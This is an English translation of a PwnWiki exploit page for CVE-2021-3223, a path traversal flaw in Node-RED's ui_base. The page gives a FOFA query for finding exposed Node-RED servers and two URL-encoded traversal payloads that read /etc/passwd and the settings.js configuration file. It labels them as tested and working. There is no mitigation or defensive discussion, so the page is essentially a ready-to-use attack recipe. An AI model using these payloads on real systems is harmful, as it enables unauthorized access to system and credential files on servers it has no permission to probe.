CVE-2021-3223 Node-RED ui base arbitrary file reading vulnerability

From PwnWiki
This page is a translated version of the page CVE-2021-3223 Node-RED ui base 任意文件讀取漏洞 and the translation is 100% complete.
Other languages:
Chinese • ‎English • ‎中文(中国大陆)‎


Check.png The vulnerability has been verified

The EXP/POC/Payload on this page has been tested and available, and the vulnerability has been successfully reproduced.

Vulnerability Impact

Node-RED

FOFA

title="Node-RED"

POC

/ui_base/js/..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2f..%2fetc%2fpasswd
/ui_base/js/..%2f..%2f..%2f..%2fsettings.js

Reference

https://mp.weixin.qq.com/s/KRGKXAJQawXl88RBPTaAeg

Retrieved from "https://pwnwiki.com/index.php?title=CVE-2021-3223_Node-RED_ui_base_任意文件讀取漏洞/en&oldid=6269"